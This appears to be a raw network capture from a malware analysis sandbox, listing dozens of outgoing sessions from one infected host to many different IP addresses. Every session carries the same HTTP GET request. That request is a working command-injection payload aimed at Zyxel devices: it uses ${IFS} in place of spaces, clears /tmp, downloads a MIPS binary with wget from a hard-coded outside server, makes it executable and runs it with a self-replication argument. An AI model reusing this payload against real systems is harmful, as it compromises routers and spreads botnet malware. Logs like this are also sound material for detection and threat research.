                                              Jan 29, 2024 07:03:39.803375006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1986192.168.2.1456312156.48.50.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.803419113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1987192.168.2.145560661.218.103.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.803456068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1988192.168.2.1449424194.147.95.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.803483009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1989192.168.2.145027820.7.28.182443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.803520918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1990192.168.2.143887489.18.9.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.803563118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1991192.168.2.1440566185.76.189.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.803596020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1992192.168.2.1434588103.79.210.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.803639889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1993192.168.2.145958654.0.39.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.803683996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1994192.168.2.1434974119.91.224.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.803709030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1995192.168.2.1459058122.157.27.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.803760052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1996192.168.2.1445688169.1.213.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.803797007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1997192.168.2.1452338217.36.231.59443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.803845882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1998192.168.2.1447208128.27.248.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.803885937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1999192.168.2.1433232217.153.138.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.803924084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2000192.168.2.145563472.39.251.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.803947926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2001192.168.2.1454182213.100.40.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.803985119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2002192.168.2.1434254170.214.58.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.804013968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2003192.168.2.14400822.131.93.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.804069996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2004192.168.2.143764674.211.64.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.804095984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2005192.168.2.145111057.218.75.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.804127932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2006192.168.2.143284485.35.191.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.804174900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2007192.168.2.1456386169.109.253.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.807538033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2008192.168.2.1459526219.36.1.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.807571888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2009192.168.2.1446260157.182.203.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.807629108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2010192.168.2.1457040106.100.105.155443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:39.807655096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2011192.168.2.1458970144.201.150.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.817570925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2012192.168.2.1456064213.116.144.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.817826033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2013192.168.2.143358242.109.219.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.817873955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2014192.168.2.1445688121.250.166.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.817902088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2015192.168.2.1453680220.94.138.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.817935944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2016192.168.2.143864246.235.147.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.817975044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2017192.168.2.1451112102.16.214.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.818011045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2018192.168.2.144964017.188.154.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.818043947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2019192.168.2.1436870161.148.55.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.818078041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2020192.168.2.1435314182.115.130.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.818120956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2021192.168.2.1441030112.244.69.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.818160057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2022192.168.2.1451986203.180.148.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.818202019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2023192.168.2.1460232203.95.239.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.818255901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2024192.168.2.146042412.143.223.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.818296909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2025192.168.2.1443482148.77.229.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.818320990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2026192.168.2.1437854205.124.43.180443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.818356991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2027192.168.2.1453438151.229.190.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.818404913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2028192.168.2.1450782217.176.227.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.818434954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2029192.168.2.1445134199.25.102.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.818478107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2030192.168.2.1441598102.228.70.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.818523884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2031192.168.2.1460340145.245.87.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.818578005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2032192.168.2.146087820.17.151.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.818613052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2033192.168.2.145274213.131.74.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.818654060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2034192.168.2.145326051.74.175.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.818698883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2035192.168.2.1442706188.60.51.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.818738937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2036192.168.2.143875617.58.194.63443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.818777084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2037192.168.2.1436958217.111.1.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.818809986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2038192.168.2.143307434.184.95.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.818830967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2039192.168.2.145915883.124.131.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.818866014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2040192.168.2.143617491.220.65.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.818892002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2041192.168.2.145830227.88.68.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.818933010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2042192.168.2.1454336189.88.246.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.818974972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2043192.168.2.144959436.87.152.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.818994999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2044192.168.2.146011853.158.220.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.819025993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2045192.168.2.145506649.93.149.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.819076061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2046192.168.2.144178854.79.218.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.819122076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2047192.168.2.1447414141.19.196.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.819149017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2048192.168.2.1451418182.112.205.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.819174051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2049192.168.2.1443040132.82.114.75443
                                              TimestampBytes transferredDirectionData
